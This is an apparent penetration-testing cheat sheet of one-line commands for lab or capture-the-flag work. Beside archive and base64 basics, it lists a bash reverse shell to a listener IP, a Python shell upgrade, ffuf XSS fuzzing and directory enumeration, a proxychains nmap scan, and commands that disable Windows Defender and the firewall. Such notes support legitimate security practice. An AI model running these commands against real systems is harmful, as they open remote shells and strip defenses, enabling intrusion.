(constantly under construction)
Python interactive shell
- python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
Linux Reverse Shell in one line
- /bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.74/443 0>&1’
File Extraction
- tar ball: tar -xvf <filename.tar.gz or just .tar> -C <target file>
- zip: unzip -q <filename.zip> -d </path/to/dir>
File Compression
- tar ball: tar -czvf archive.tar file1 file2
- zip: zip -q <archivename.zip> file1 file2 file3
Base64 encode and decode
- Directly at the command line
- echo -n “plaintext” | base64
- echo -n “base64 encoded” | base64 –decode
- From the text file when it contains special characters
- base64 input.txt
- base64 input.txt –decode
FFUF FFUZ
The general flags
- Use keyword FUZZ to the field where you want to fuzz or enumerate.
- -w, to specify the wordlist
- -X POST, to specify the HTTP method
- -d, to specify the data
- -H, to specify the header value.
- -mc all -ac, to show all the response and exclude those specified.
- -ac 404,502, to exclude status code 404 and 502
- -fs, exclude size with the provided number, separate with a comma
- -fw exclude words with the provided number, separate with a comma
- -e, adding the extension
- XXS fuzz with POST request
ffuf -w /usr/share/wordlists/seclists/Fuzzing/XSS/human-friendly/XSS-BruteLogic.txt -u http://10.129.232.215:5000/support -X POST -d "fname=123&lname=123&email=hello%40123.com&phone=123&message=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -mc all -ac
- directory enumeration
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://10.129.232.215:5000/FUZZ -mc all -ac
Nmap Proxychains scan
- sudo proxychains nmap -sT –top-port=20 -Pn 172.16.x.194
“
“
Disable AV and Firewall
- powershell -c “Set-MpPreference -DisableRealtimeMonitoring $true” & netsh advfirewall set allprofiles state off
- Set-MpPreference -DisableRealtimeMonitoring $true & netsh advfirewall set allprofiles state off